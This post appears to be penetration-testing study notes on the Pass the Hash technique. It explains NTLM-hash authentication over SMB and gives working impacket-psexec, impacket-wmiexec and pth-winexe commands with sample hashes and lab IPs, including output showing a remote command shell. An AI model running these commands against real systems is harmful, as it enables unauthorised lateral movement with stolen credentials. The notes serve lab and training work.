Pass The Hash
Post

Pass The Hash

Pass The Hash Attack

The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user’s NTLM hash instead of the associated plaintext password. Note that this will not work for Kerberos authentication but only for server or service using NTLM authentication.

Many third-party tools and frameworks use PtH to allow users to both authenticate and obtain code execution, including PsExec from Metasploit, Passing-the-hash toolkit, and Impacket. The mechanics behind them are more or less the same in that the attacker connects to the victim using the Server Message Block (SMB) protocol and performs authentication using the NTLM hash.

Most tools built to exploit PtH create and start a Windows service (for example cmd.exe or an instance of PowerShell) and communicate with it using Named Pipes. This is done using the Service Control ManagerAPI.

This technique requires an SMB connection through the firewall (commonly port 445), and the Windows File and Print Sharing feature to be enabled. These requirements are common in internal enterprise environments.

When a connection is performed, it normally uses a special admin share called Admin$. In order to establish a connection to this share, the attacker must present valid credentials with local administrative permissions. In other words, this type of lateral movement typically requires local administrative rights.

Note that PtH uses the NTLM hash legitimately. However, the vulnerability lies in the fact that we gained unauthorized access to the password hash of a local administrator.

To extract hashes for a pass the hash, go to Dumping SAM section or DCSync section.

Impacket-psexec

You can use impacket-psexec to pass the hash into winrm service:

1
impacket-psexec offsec.local/Administrator:@192.168.143.59 -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5

Examples: Sizzle [[Sauna#^]]

Impacket-wmiexec

1
impacket-wmiexec htb.local/Administrator@10.10.10.103 -hashes :f6b7160bfc91823792e0ac3a162c9267

Examples: Sizzle

PtH

We can use pth-winexe from the Passing-The-Hash toolkit, just as we did when we passed the hash to a non-domain joined user in the Password Attacks module:

1
2
3
4
5
6
7
kali@kali:~$ pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>